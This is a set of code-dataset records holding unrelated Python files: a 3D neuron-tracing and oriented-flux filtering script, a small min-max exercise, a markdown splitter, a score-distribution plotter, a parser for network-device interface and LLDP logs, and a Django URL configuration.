29.0364, 27.7485, 26.526, 25.365, 24.2624,\n 23.2148, 22.2193, 21.273, 20.3733, 19.5176, 18.7037, 17.9292, 17.192,\n 16.4902, 15.822, 15.1855, 14.579, 14.0011, 13.4503, 12.9251, 12.4242,\n 11.9464, 11.4905, 11.0554, 10.6401, 10.2435, 9.86473, 9.50289, 9.15713,\n 8.82667, 8.51075, 8.20867, 7.91974, 7.64333, 7.37884, 7.12569, 6.88334,\n 6.65128, 6.42902, 6.2161, 6.01209, 5.81655, 5.62911, 5.44938, 5.27701,\n 5.11167, 4.95303, 4.80079, 4.65467, 4.51437, 4.37966, 4.25027, 4.12597,\n 4.00654, 3.89176, 3.78144, 3.67537, 3.57337, 3.47528, 3.38092, 3.29013,\n 3.20276, 3.11868, 3.03773, 2.9598, 2.88475, 2.81247, 2.74285, 2.67577,\n 2.61113, 2.54884, 2.48881, 2.43093, 2.37513, 2.32132, 2.26944, 2.21939,\n 2.17111, 2.12454, 2.07961, 2.03625, 1.99441, 1.95403, 1.91506, 1.87744,\n 1.84113, 1.80608, 1.77223, 1.73956, 1.70802, 1.67756, 1.64815, 1.61976,\n 1.59234, 1.56587, 1.54032, 1.51564, 1.49182, 1.46883, 1.44664, 1.42522,\n 1.40455, 1.3846, 1.36536, 1.3468, 1.3289, 1.31164, 1.29501, 1.27898,\n 1.26353, 1.24866, 1.23434, 1.22056, 1.2073, 1.19456, 1.18231, 1.17055,\n 1.15927, 1.14844, 1.13807, 1.12814, 1.11864, 1.10956, 1.10089, 1.09262,\n 1.08475, 1.07727, 1.07017, 1.06345, 1.05709, 1.05109, 1.04545, 1.04015,\n 1.03521, 1.0306, 1.02633, 1.02239, 1.01878, 1.0155, 1.01253, 1.00989,\n 1.00756, 1.00555, 1.00385, 1.00246, 1.00139, 1.00062, 1.00015, 1\n]\n\ndef GI(w,h,d, img, max_intensity, min_intensity):\n index = (int)((img[w][h][d] - min_intensity)/max_intensity * 255)\n if index > 255:\n index = 255\n return givals[index]\n\n\"\"\"\nExhaustive Tracing\n\n\"\"\"\ndef exhaustive_tracing(img, bimg, dt_result, timemap, size, seed, max_intensity,threshold,out_path,r_iter,coverage_ratio):\n # state 0 for FAR, state 1 for TRAIL, state 2 for ALIVE\n state = np.zeros((size[0], size[1], size[2]))\n result = []\n\n # initialize \n tbimg = np.copy(bimg)\n phi = np.empty((size[0], size[1], size[2]), dtype=np.float32)\n parent = np.empty((size[0], size[1], size[2]), dtype=np.int32)\n prev = np.empty((size[0], size[1], size[2]), dtype=np.int32)\n swc_index = np.empty((size[0], size[1], size[2]), dtype=np.int32)\n\n for i in range(size[0]):\n phi[i,:,:] = np.inf\n\n current_index = 0\n # put seed into ALIVE set\n state[seed[0],seed[1],seed[2]] = 2\n phi[seed[0],seed[1],seed[2]] = 0.0\n swc_index[seed[0],seed[1],seed[2]] = 1\n prev[seed[0],seed[1],seed[2]] = 1\n\n # trail set structure[phi,w,h,d,par_id]\n trail_set = np.asarray([[0,seed[0],seed[1],seed[2]]],dtype=np.float32)\n\n # alive set structure: [id,radius,w,h,d,1,par_id]\n alive_set = None\n starttime = time.time()\n totaltime = 0\n counter = 0\n while (trail_set.size != 0):\n counter+=1\n min_ind = trail_set[0,:]\n\n trail_set = np.delete(trail_set, (0), axis=0)\n i,j,k = min_ind[1:4]\n i = int(i)\n j = int(j)\n k = int(k)\n prev_ind = prev[i,j,k]\n parent[i,j,k] = prev_ind\n\n state[i][j][k] = 2\n swc_index[i][j][k] = current_index\n # print(alive_set.shape)\n if alive_set is None:\n alive_set = np.asarray([[current_index,3,i,j,k,1,0]],dtype=np.int32)\n else:\n alive_set = np.vstack((alive_set,[current_index,3,i,j,k,1,prev_ind]))\n # print('alive:',alive_set)\n\n tbimg[i][j][k] = 2\n current_index += 1\n\n neighbor_ind = get_neighbor_ind(img.shape,i-1,i+2,j-1,j+2,k-1,k+2)\n\n for ind in neighbor_ind:\n factor = 1\n if ind[3] == 2:\n factor = 1.414214\n\n w,h,d = ind[0:3]\n\n if (img[w,h,d] <= threshold and\n img[i,j,k] <= threshold):\n continue\n\n if (state[w][h][d] != 2):\n # min_intensity set as 0\n new_dist = phi[w][h][d] + (GI(\n w,h,d, img, max_intensity, 0.0) + GI(\n i,j,k, img, max_intensity, 0.0)) * factor * 0.5\n \n prev_ind = swc_index[i][j][k]\n\n if (state[w,h,d] == 0):\n phi[w,h,d] = new_dist\n # insert into trail set\n if trail_set.shape[0] == 0:\n trail_set = np.asarray([[new_dist,w,h,d]],dtype=np.float32)\n else:\n trail_set = np.vstack((trail_set,[new_dist,w,h,d]))\n trail_set = trail_set[np.argsort(trail_set[:,0])]\n\n prev[w][h][d] = prev_ind\n state[w][h][d] = 1\n\n elif (state[w][h][d] == 1):\n if (phi[w][h][d] > new_dist):\n phi[w][h][d] = new_dist\n temp_ind = np.argwhere((trail_set[:,1] == w) & (trail_set[:,2] == h) & (trail_set[:,3] == d))[0]\n trail_set[temp_ind][0] = new_dist\n trail_set = trail_set[np.argsort(trail_set[:,0])]\n sort_time = time.time()\n prev[w][h][d] = prev_ind\n\n print('alive size:',alive_set.shape)\n ini = alive_set.copy()\n swc_x = ini[:, 2].copy()\n swc_y = ini[:, 3].copy()\n ini[:, 2] = swc_y\n ini[:, 3] = swc_x\n saveswc(out_path + 'ini.swc',ini) \n bb = np.zeros(img.shape) \n hp_result,bb = hp(img,bimg,size,alive_set,out_path,threshold,bb,1,bimg,coverage_ratio)\n result = hp_result\n print(result.shape)\n\n if r_iter == 0:\n swc_x = result[:, 2].copy()\n swc_y = result[:, 3].copy()\n result[:, 2] = swc_y\n result[:, 3] = swc_x\n saveswc(out_path + str(r_iter) + 'result.swc',result)\n return\n\n # enhanced iteration\n far = np.argwhere(bimg == 1)\n if far.shape[0] != 0:\n no_iteration = 0\n # current_index += 1\n far_timemap = np.array([[]])\n for f in far:\n # if (bimg[f[0]][f[1]][f[2]]] == 1):\n if far_timemap.shape[1] == 0:\n far_timemap = np.asarray([[f[0],f[1],f[2],timemap[f[0]][f[1]][f[2]]]])\n else:\n far_timemap = np.vstack((far_timemap,[f[0],f[1],f[2],timemap[f[0]][f[1]][f[2]]]))\n sort_timemap = far_timemap[np.argsort(far_timemap[:,3])]\n sort_timemap = sort_timemap[::-1]\n\n alive_loc = alive_set[2:5]\n\n \n while (far.size > 0 and sort_timemap.size > 0):\n # alive_set = []\n padding_index = current_index\n\n if(no_iteration >= r_iter):\n break\n\n #UPDATE \n trail_set = np.asarray([[0,sort_timemap[0][0],sort_timemap[0][1],sort_timemap[0][2]]])\n\n new_alive = np.asarray([[]])\n\n while (trail_set.size != 0):\n min_ind = trail_set[0,:]\n\n trail_set = np.delete(trail_set, (0), axis=0)\n i = int(min_ind[1])\n j = int(min_ind[2])\n k = int(min_ind[3])\n if state[i][j][k] != 3:\n print(state[i][j][k])\n\n prev_ind = prev[i][j][k]\n parent[i][j][k] = prev_ind\n\n state[i][j][k] = 4\n swc_index[i][j][k] = current_index\n\n if(new_alive.shape[1] == 0):\n new_alive = np.asarray([[0,3,i,j,k,1,-1]])\n alive_set = np.vstack((alive_set,[current_index,3,i,j,k,1,-1]))\n else:\n p_ind = prev_ind-padding_index\n new_alive = np.vstack((new_alive,[current_index-padding_index,3,i,j,k,1,p_ind]))\n alive_set = np.vstack((alive_set,[current_index,3,i,j,k,1,prev_ind]))\n tbimg[i][j][k] = 2\n current_index += 1\n totaltime+=(time.time()-starttime)\n\n neighbor_ind = get_neighbor_ind(img.shape,i-1,i+2,j-1,j+2,k-1,k+2)\n\n for ind in neighbor_ind:\n\n w,h,d = ind[0:3]\n factor = 1\n if ind[3] == 2:\n factor = 1.414214\n\n if (img[w][h][d] <= threshold):\n continue\n\n if (state[w][h][d] == 1 or state[w][h][d] == 2):\n break\n\n if (state[w][h][d] != 4):\n # min_intensity set as 0\n new_dist = phi[w][h][d] + (GI(\n w,h,d, img, max_intensity, 0.0) + GI(\n i,j,k, img, max_intensity, 0.0)\n ) * factor * 0.5\n prev_ind = swc_index[i][j][k]\n\n if (state[w][h][d] == 0):\n phi[w][h][d] = new_dist\n # insert into trail set\n if trail_set.shape[1] == 0:\n trail_set = np.vstack((trail_set,[new_dist,w,h,d]))\n else:\n sort_time = time.time()\n trail_set = np.vstack((trail_set,[new_dist,w,h,d]))\n trail_set = trail_set[np.argsort(trail_set[:,0])]\n\n prev[w][h][d] = prev_ind\n # 3 for reinforce trail\n state[w][h][d] = 3\n\n elif (state[w][h][d] == 3):\n if (phi[w][h][d] > new_dist):\n phi[w][h][d] = new_dist\n temp_ind = np.argwhere((trail_set[:,1] == w) & (trail_set[:,2] == h) & (trail_set[:,3] == d))[0]\n trail_set[temp_ind][0] = new_dist\n trail_set = trail_set[np.argsort(trail_set[:,0])]\n sort_time = time.time()\n prev[w][h][d] = prev_ind \n if(new_alive.size == 0):\n no_iteration += 1\n continue\n # print('new_alive shape',new_alive.shape)\n new = new_alive.copy()\n swc_x = new[:, 2].copy()\n swc_y = new[:, 3].copy()\n new[:, 2] = swc_y\n new[:, 3] = swc_x\n\n hp_result,bb = hp(img,bimg,size,new_alive,out_path,threshold,bb,2,bimg,coverage_ratio)\n\n # print('no of enhanced iteration: ',no_iteration)\n if(hp_result is None or hp_result.shape[1] == 0):\n no_iteration += 1\n continue\n\n # print('padding index', padding_index)\n hp_result[:,0] += padding_index\n hp_result[:,6] += padding_index\n hp_result[:,5] = 1\n result = np.vstack((result,hp_result))\n sort_timemap = np.delete(sort_timemap,0)\n no_iteration += 1\n \n print('--Enhanced tracing finished')\n print('--Enhanced iteration: %.2f sec.' % (time.time() - starttime))\n r = alive_set\n\n swc_x = alive_set[:, 2].copy()\n swc_y = alive_set[:, 3].copy()\n alive_set[:, 2] = swc_y\n alive_set[:, 3] = swc_x\n\n swc_x = result[:, 2].copy()\n swc_y = result[:, 3].copy()\n result[:, 2] = swc_y\n result[:, 3] = swc_x\n saveswc(out_path + '_ini.swc',alive_set)\n saveswc(out_path + '_result.swc',result)\n\n return r\n\ndef get_neighbor_ind(size,i_min,i_max,j_min,j_max,k_min,k_max):\n result = []\n i = i_min + 1\n j = j_min + 1\n k = k_min + 1\n if i-1 < 0:\n i_min = i\n if i+1 >= size[0]:\n i_max = i+1\n if j-1 < 0:\n j_min = j\n if j+1 >= size[1]:\n j_max = j+1\n if k-1 < 0:\n k_min = k\n if k+1 >= size[2]:\n k_max = k+1\n\n for kk in range(k_min,k_max):\n for jj in range(j_min,j_max):\n for ii in range(i_min,i_max):\n offset = abs(k-kk) + abs(j-jj) + abs(i-ii)\n if offset <= 2 and offset != 0:\n result.append([ii,jj,kk,offset])\n\n return np.asarray(result)\n\n\ndef crop(img,spatial1,spatial2):\n \"\"\"Crop a 3D block with value > thr\"\"\"\n minx = int(np.minimum(spatial1[0],spatial2[0]))\n maxx = int(np.maximum(spatial1[0],spatial2[0]))\n miny = int(np.minimum(spatial1[1],spatial2[1]))\n maxy = int(np.maximum(spatial1[1],spatial2[1]))\n minz = int(np.minimum(spatial1[2],spatial2[2]))\n maxz = int(np.maximum(spatial1[2],spatial2[2]))\n return img[minx:maxx, miny:maxy, minz:maxz]\n\ndef enhance(img,spatial1,spatial2,img2):\n minx = int(np.minimum(spatial1[0],spatial2[0]))\n maxx = int(np.maximum(spatial1[0],spatial2[0]))\n miny = int(np.minimum(spatial1[1],spatial2[1]))\n maxy = int(np.maximum(spatial1[1],spatial2[1]))\n minz = int(np.minimum(spatial1[2],spatial2[2]))\n maxz = int(np.maximum(spatial1[2],spatial2[2]))\n img[minx:maxx, miny:maxy, minz:maxz] = img2\n return img\n\n\ndef response(img, radii,rsptype='oof'):\n eps = 1e-12\n rsp = np.zeros(img.shape)\n # bar = progressbar.ProgressBar(max_value=kwargs['radii'].size)\n # bar.update(0)\n\n W = np.zeros((img.shape[0], img.shape[1], img.shape[2], 3)) # Eigen values to save\n V = np.zeros((img.shape[0], img.shape[1], img.shape[2], 3, 3)) # Eigen vectors to save\n\n if rsptype == 'oof' :\n rsptensor = ooftensor(img, radii)\n\n # pbar = tqdm(total=len(radii))\n for i, tensorfield in enumerate(rsptensor):\n # Make the tensor from tensorfield\n f11, f12, f13, f22, f23, f33 = tensorfield\n tensor = np.stack((f11, f12, f13, f12, f22, f23, f13, f23, f33), axis=-1)\n del f11\n del f12\n del f13\n del f22\n del f23\n del f33\n tensor = tensor.reshape(img.shape[0], img.shape[1], img.shape[2], 3, 3)\n w, v = np.linalg.eigh(tensor)\n del tensor\n sume = w.sum(axis=-1)\n nvox = img.shape[0] * img.shape[1] * img.shape[2]\n sortidx = np.argsort(np.abs(w), axis=-1)\n sortidx = sortidx.reshape((nvox, 3))\n\n # Sort eigenvalues according to their abs\n w = w.reshape((nvox, 3))\n for j, (idx, value) in enumerate(zip(sortidx, w)):\n w[j,:] = value[idx]\n w = w.reshape(img.shape[0], img.shape[1], img.shape[2], 3)\n\n # Sort eigenvectors according to their abs\n v = v.reshape((nvox, 3, 3))\n for j, (idx, vec) in enumerate(zip(sortidx, v)):\n v[j,:,:] = vec[:, idx]\n del sortidx\n v = v.reshape(img.shape[0], img.shape[1], img.shape[2], 3, 3)\n\n mine = w[:,:,:, 0]\n mide = w[:,:,:, 1]\n maxe = w[:,:,:, 2]\n\n if rsptype == 'oof':\n feat = maxe\n elif rsptype == 'bg':\n feat = -mide / maxe * (mide + maxe) # Medialness measure response\n cond = sume >= 0\n feat[cond] = 0 # Filter the non-anisotropic voxels\n\n del mine\n del maxe\n del mide\n del sume\n\n cond = np.abs(feat) > np.abs(rsp)\n W[cond, :] = w[cond, :]\n V[cond, :, :] = v[cond, :, :]\n rsp[cond] = feat[cond]\n del v\n del w\n del tensorfield\n del feat\n del cond\n # pbar.update(1)\n # print('rsp value',np.max(rsp),np.min(rsp))\n\n return rsp, V, W\n\n\n\ndef ooftensor(img, radii, memory_save=True):\n '''\n type: oof, bg\n '''\n # sigma = 1 # TODO: Pixel spacing\n eps = 1e-12\n # ntype = 1 # The type of normalisation\n fimg = fftn(img, overwrite_x=True)\n shiftmat = ifftshiftedcoormatrix(fimg.shape)\n x, y, z = shiftmat\n x = x / fimg.shape[0]\n y = y / fimg.shape[1]\n z = z / fimg.shape[2]\n kernel_radius = np.sqrt(x ** 2 + y ** 2 + z ** 2) + eps # The distance from origin\n\n for r in radii:\n # Make the fourier convolutional kernel\n jvbuffer = oofftkernel(kernel_radius, r) * fimg\n\n if memory_save:\n # F11\n buffer = ifftshiftedcoordinate(img.shape, 0) ** 2 * x * x * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f11 = buffer.copy()\n\n # F12\n buffer = ifftshiftedcoordinate(img.shape, 0) * ifftshiftedcoordinate(img.shape, 1) * x * y * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f12 = buffer.copy()\n\n # F13\n buffer = ifftshiftedcoordinate(img.shape, 0) * ifftshiftedcoordinate(img.shape, 2) * x * z * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f13 = buffer.copy()\n\n # F22\n buffer = ifftshiftedcoordinate(img.shape, 1) ** 2 * y ** 2 * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f22 = buffer.copy()\n\n # F23\n buffer = ifftshiftedcoordinate(img.shape, 1) * ifftshiftedcoordinate(img.shape, 2) * y * z * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f23 = buffer.copy()\n\n # F33\n buffer = ifftshiftedcoordinate(img.shape, 2) * ifftshiftedcoordinate(img.shape, 2) * z * z * jvbuffer\n buffer = ifft(buffer, axis=0)\n buffer = ifft(buffer, axis=1)\n buffer = ifft(buffer, axis=2)\n f33 = buffer.copy()\n else:\n f11 = np.real(ifftn(x * x * jvbuffer))\n f12 = np.real(ifftn(x * y * jvbuffer))\n f13 = np.real(ifftn(x * z * jvbuffer))\n f22 = np.real(ifftn(y * y * jvbuffer))\n f23 = np.real(ifftn(y * z * jvbuffer))\n f33 = np.real(ifftn(z * z * jvbuffer))\n yield [f11, f12, f13, f22, f23, f33]\n\ndef ifftshiftedcoormatrix(shape):\n shape = np.asarray(shape)\n p = np.floor(np.asarray(shape) / 2).astype('int')\n coord = []\n for i in range(shape.size):\n a = np.hstack((np.arange(p[i], shape[i]), np.arange(0, p[i]))) - p[i] - 1.\n repmatpara = np.ones((shape.size,)).astype('int')\n repmatpara[i] = shape[i]\n A = a.reshape(repmatpara)\n repmatpara = shape.copy()\n repmatpara[i] = 1\n coord.append(np.tile(A, repmatpara))\n\n return coord\n\n\ndef ifftshiftedcoordinate(shape, axis):\n shape = np.asarray(shape)\n p = np.floor(np.asarray(shape) / 2).astype('int')\n a = (np.hstack((np.arange(p[axis], shape[axis]), np.arange(0, p[axis]))) - p[axis] - 1.).astype('float')\n a /= shape[axis].astype('float')\n reshapepara = np.ones((shape.size,)).astype('int');\n reshapepara[axis] = shape[axis];\n A = a.reshape(reshapepara);\n repmatpara = shape.copy();\n repmatpara[axis] = 1;\n return np.tile(A, repmatpara)\n\ndef oofftkernel(kernel_radius, r, sigma=1, ntype=1):\n eps = 1e-12\n normalisation = 4/3 * np.pi * r**3 / (jv(1.5, 2*np.pi*r*eps) / eps ** (3/2)) / r**2 * \\\n (r / np.sqrt(2.*r*sigma - sigma**2)) ** ntype\n jvbuffer = normalisation * np.exp( (-2 * sigma**2 * np.pi**2 * kernel_radius**2) / (kernel_radius**(3/2) ))\n return (np.sin(2 * np.pi * r * kernel_radius) / (2 * np.pi * r * kernel_radius) - np.cos(2 * np.pi * r * kernel_radius)) * \\\n jvbuffer * np.sqrt( 1./ (np.pi**2 * r *kernel_radius ))\n\n","sub_path":"exhaustive_tracing.py","file_name":"exhaustive_tracing.py","file_ext":"py","file_size_in_byte":20237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"185326344","text":"def min_max(arr):\n min=arr[0]\n max=arr[0]\n sum=0\n l=len(arr)\n for x in range(l):\n if min > arr[x]:\n min=arr[x]\n if max < arr[x]:\n max=arr[x]\n sum=sum+arr[x]\n temp=max\n max=sum-min\n min=sum-temp\n print(max,' ',min)\nmin_max([1,2,3,4,5])","sub_path":"problem1/problem13.py","file_name":"problem13.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"608910511","text":"# coding=utf-8\r\nimport os\r\nclass MDFileSplitter:\r\n\r\n def __init__(self, s):\r\n self.path = s\r\n self.file = open(s)\r\n self.article_summary = \"\"\r\n self.splitter()\r\n\r\n def splitter(self):\r\n url = os.path.basename(self.path)\r\n title = self.file.readline().replace(' ', '').replace('\\'', '').replace('title:', '').strip() # title\r\n time_in = map(lambda x: x.strip(), str(self.file.readline()).split(' ')) # time\r\n time_str = time_in[1] + ' ' + time_in[2]\r\n categories = self.file.readline().replace(' ', '').replace('categories:', '') # categories\r\n # skip article splitter\r\n self.file.readline()\r\n # contents\r\n content = self.file.read()\r\n\r\n # summary\r\n self.article_summary = {'url': url, 'title': title, 'TimeStr': time_str, 'Categories': categories,\r\n 'Content': content}\r\n\r\n def get_info(self):\r\n return self.article_summary\r\n","sub_path":"mdfilesplitter.py","file_name":"mdfilesplitter.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"479738392","text":"import sys\n\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport numpy as np\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\n\nargs = sys.argv\n\ntrial_file = args[1]\nscore_file = args[2]\nsave_file = args[3]\n\ntgt_scores = []\nnontgt_scores = []\n\nwith open(trial_file, 'r') as tf, open(score_file, 'r') as sf:\n tf_lines = tf.read().splitlines()\n trial_types = [x.split()[2] for x in tf_lines]\n sf_lines = sf.read().splitlines()\n scores = [float(x.split()[2]) for x in sf_lines]\n\n for ttype, score in zip(trial_types, scores):\n if ttype == \"target\":\n tgt_scores.append(score)\n else:\n nontgt_scores.append(score)\n\ntgt_scores = sorted(tgt_scores)\nnontgt_scores = sorted(nontgt_scores)\n\nfit_tgt = stats.norm.pdf(tgt_scores, np.mean(tgt_scores), np.std(tgt_scores))\nfit_nontgt = stats.norm.pdf(nontgt_scores, np.mean(nontgt_scores), np.std(nontgt_scores))\n\nplt.plot(tgt_scores, fit_tgt, '-g')\nplt.hist(tgt_scores, bins=20, normed=True)\n\nplt.plot(nontgt_scores, fit_nontgt, '-r')\nplt.hist(nontgt_scores, bins=20, normed=True)\n\nsp = save_file.split('_')\nif len(sp) > 9:\n title = \"PPG type = \"+sp[-9]\n title = title+\", Rand level = \"+sp[-7]\n title = title+\", Cross-gender =\"+sp[-5]\n title = title+\", Distance = \"+sp[-3]\n title = title+\", Proximity = \"+sp[-1]\n plt.title(title+'.')\n\nplt.savefig(save_file, dpi=300)\n\n\n","sub_path":"egs/voice_privacy/v1/local/plot/plot_trial_score_dist.py","file_name":"plot_trial_score_dist.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"242958784","text":"#!python3\n# coding:utf-8\n\n'''\nscreen-length 0 temporary\ndisplay interface brief main\ndisplay interface description | exclude \\.\ndisplay lldp neighbor\n'''\n\n'''\n['Interface', 'PHY', 'Protocol', 'InUti', 'OutUti', 'inErrors', 'outErrors']\n['Interface', 'PHY', 'Protocol', 'Description']\n['Local Intf', 'Neighbor Dev', 'Neighbor Intf', 'Exptime (sec)']\n'''\n\n'''\n取消屏幕显示长度\n获取 聚合组 与 物理口 的关系、获取 物理up/down\n获取 端口描述\n获取 对端实际设备信息\n'''\n\n\nfrom datetime import datetime\nimport platform\nfrom colorama import Fore, Back, Style, init\nimport pandas as pd\nfrom pathlib import Path\nimport re\n_version = '1.0'\n\n'''\n# ChangeLog\n\n### v1.0 (2021-09-30) \n\n- 根据采集信息整理输出\n'''\n\ninit(autoreset=True)\nif platform.system() == 'Windows':\n init(wrap=True)\nfile_names = Path().rglob('*.log')\ncontents = []\nfor file in file_names:\n if file == 'AutoRun.log':\n continue\n if '\\\\' in str(file):\n continue\n try:\n with open(file, encoding='utf-8') as f:\n contents.append(f.read().splitlines())\n except:\n ...\n\nrecord_list = ['Interface PHY Protocol InUti OutUti inErrors outErrors',\n 'Interface PHY Protocol Description ',\n 'Local Intf Neighbor Dev Neighbor Intf Exptime (sec)'\n ]\nflag_list = [['Interface', 'PHY', 'Protocol', 'InUti', 'OutUti', 'inErrors', 'outErrors'],\n ['Interface', 'PHY', 'Protocol', 'Description', ''],\n ['Local', 'Intf', 'Neighbor', 'Dev', 'Neighbor', 'Intf', 'Exptime', '(sec)']]\nflag_list = [['Interface', 'PHY', 'Protocol', 'InUti'],\n ['Interface', 'PHY', 'Protocol', 'Description'],\n ['Local', 'Intf', 'Neighbor', 'Dev']]\nflag_key = ['flag_interface_brief',\n 'flag_interface_desc',\n 'flag_lldp_neighbor']\n\n\ndef get_device_name(content=[]) -> str:\n '''\n 获取设备名\n '''\n device_name = ''\n len_content = len(content)\n i = 0\n while True:\n r_match_name = re.search(r'<(.+[ME60|CMNET\\-SW].+)>', content[i])\n if r_match_name != None:\n device_name = r_match_name.group(1)\n return device_name\n elif i < len_content:\n i += 1\n else:\n print('No device name was found! Abort program.')\n return ''\n\n\ndef get_device_nick_name(device_name='') -> str:\n '''\n 获取设备别名\n '''\n return re.search(r'BAS[0-9]+', device_name).group(0)\n\n\ndef get_start_index(content=[], flag=[]) -> int:\n '''\n 定位数据采集起始点\n '''\n for index, value in enumerate(content):\n _list = re.split(r' +', value)\n if _list[:4] == flag:\n return index + 1\n return False\n\n\ndef get_interfaces(content=[]) -> list:\n '''\n 获取 聚合组 端口信息、up/down、\n 当前匹配 ME60\n '''\n\n def _get_frame_slot(port):\n r = re.search(r'([0-9]+)/([0-9]+)', port)\n frame = r.group(1)\n solt = r.group(2)\n return frame, solt\n\n # 定位数据采集起始点\n _start = get_start_index(content, flag_list[0])\n if not _start:\n print('无法定位数据采集点', 'get_interfaces')\n return []\n device_name = get_device_name(content)\n interfaces = []\n for value in content[_start:]:\n # 定位数据采集结束点\n if device_name in value:\n break\n _list = re.split(r' +', value)\n if _list[0][:9] == 'Eth-Trunk':\n _trunk = _list[0]\n phy = '{}-{}'.format(_list[1], _list[2])\n interfaces.append([device_name, '-', '-', _trunk, _trunk, phy])\n elif _list[0] == '':\n port = _list[1]\n frame, solt = _get_frame_slot(port)\n phy = '{}-{}'.format(_list[2], _list[3])\n interfaces.append([device_name, frame, solt, port, _trunk, phy])\n elif 'Ethernet' in _list[0]:\n port = _list[0]\n frame, solt = _get_frame_slot(port)\n phy = '{}-{}'.format(_list[1], _list[2])\n interfaces.append([device_name, frame, solt, port, '-', phy])\n else:\n continue\n\n return interfaces\n\n\ndef get_desc(content=[]) -> list:\n '''\n 获取端口描述\n '''\n # 定位数据采集起始点\n _start = get_start_index(content, flag_list[1])\n if not _start:\n print('无法定位数据采集点', 'get_desc')\n return []\n device_name = get_device_name(content)\n desc = []\n for value in content[_start:]:\n # 定位数据采集结束点\n r = re.search(device_name, value)\n if r and r.start() < 3:\n break\n _list = re.split(r' +', value)\n port = _list[0]\n if 'GE' in port:\n if '100GE' not in port:\n port = port.replace('GE', 'GigabitEthernet')\n elif not 'Eth-Trunk' in port:\n continue\n description = ''.join(_list[3:])\n # print(device_name, 'port', Fore.GREEN+port)\n # print('description', Fore.GREEN+description)\n desc.append([port, description])\n return desc\n\n\ndef get_lldp(content=[]) -> list:\n '''\n 获取 lldp 信息\n '''\n # 定位数据采集起始点\n # _start = get_start_index(content, flag_list[2])\n _start = False\n for index, value in enumerate(content):\n _list = re.split(r' +', value)\n if len(_list) == 4 and _list[1] == 'has' and _list[3][:8] == 'neighbor':\n _start = index\n break\n if not _start:\n print('无法定位数据采集点', 'get_lldp')\n return []\n device_name = get_device_name(content)\n lldp = []\n for value in content[_start:]:\n # 定位数据采集结束点\n # if re.search(r'[<\\[][~\\*]?'+device_name+'.+', value):\n # break\n r = re.search(device_name, value)\n if r and r.start() < 3:\n break\n _list = re.split(r' +', value)\n # print(\"_list:\", Fore.BLUE+str(_list))\n # lldp.append([_list[0], _list[1], _list[2]])\n if len(_list) == 4 and _list[1] == 'has' and _list[3][:8] == 'neighbor':\n port2 = _list[0]\n # print('port2', Back.BLUE+port2)\n elif value[:9] == 'Port ID ':\n lldp_port = _list[2][1:]\n # print('Port ID',Fore.GREEN+lldp_port)\n elif value[:18] == 'Port description ':\n lldp_desc = ''.join(_list[2:])[1:]\n # print('System description',Fore.GREEN+lldp_desc)\n elif value[:13] == 'System name ':\n lldp_device = _list[2][1:]\n # print('System name',Fore.GREEN+lldp_device)\n lldp.append([port2, lldp_desc, lldp_device, lldp_port])\n elif _list[0] == 'PortId:':\n lldp_port = _list[1]\n # print('PortId:',Fore.BLUE+lldp_port)\n elif _list[0] == 'PortDesc:':\n lldp_desc = ''.join(_list[1:])\n # print('SysDesc',Fore.BLUE+lldp_desc)\n elif _list[0] == 'SysName:':\n lldp_device = _list[1]\n # print('SysName',Fore.BLUE+lldp_device)\n lldp.append([port2, lldp_desc, lldp_device, lldp_port])\n return lldp\n\n\ndatas = pd.DataFrame()\nfor content in contents:\n # try:\n interfaces = get_interfaces(content)\n # print(interfaces)\n desc = get_desc(content)\n # print(desc)\n lldp = get_lldp(content)\n # print(lldp)\n df_interface = pd.DataFrame(\n interfaces, columns=['设备名', '框', '槽', '端口', '所属聚合组', '状态'])\n df_desc = pd.DataFrame(desc, columns=['端口', '描述'])\n df_lldp = pd.DataFrame(\n lldp, columns=['port2', 'LLDP描述', 'LLDP对端设备', 'LLDP对端端口'])\n # ['列1'] 为辅助列,用于其他表格 vlookup\n df_interface['列1'] = (df_interface['设备名']+\"-\"+df_interface['端口']\n ).map(lambda port: port.replace('(10G)', '').replace('XG', 'G'))\n data = df_interface.merge(df_desc, how='left', on='端口').fillna('')\n data['port2'] = data['端口'].map(\n lambda port: port.replace('(10G)', '').replace('(100G)', ''))\n data = data.merge(df_lldp, how='left', on='port2').fillna('')\n data.drop('port2', axis=1, inplace=True)\n datas = datas.append(data, ignore_index=True)\n # except Exception as err:\n # print(Back.RED+str(err))\n\ndatas.sort_values(by=['设备名', '框', '槽'], inplace=True)\ntry:\n writer = pd.ExcelWriter('output.{}.xlsx'.format(\n datetime.now().strftime(\"%Y-%m-%d.%H_%M_%S\")))\n datas.to_excel(writer, index=False)\n writer.save()\nexcept Exception as err:\n print(Back.RED+str(err))\n","sub_path":"cmnet_interface_trunk.py","file_name":"cmnet_interface_trunk.py","file_ext":"py","file_size_in_byte":8691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"73631202","text":"from django.urls import path\n\nfrom home import views\nurlpatterns = [\n path(\"\",views.home,name=\"home\"),\n path(\"index\",views.index,name=\"index\"),\n path(\"blog/\",views.blog,name=\"blog\"),\n path(\"blogpost/\",views.blogpost,name=\"home\"),\n path(\"contact\",views.contact,name=\"contact\"),\n path(\"search\",views.search,name=\"search\")\n \n]\n ","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 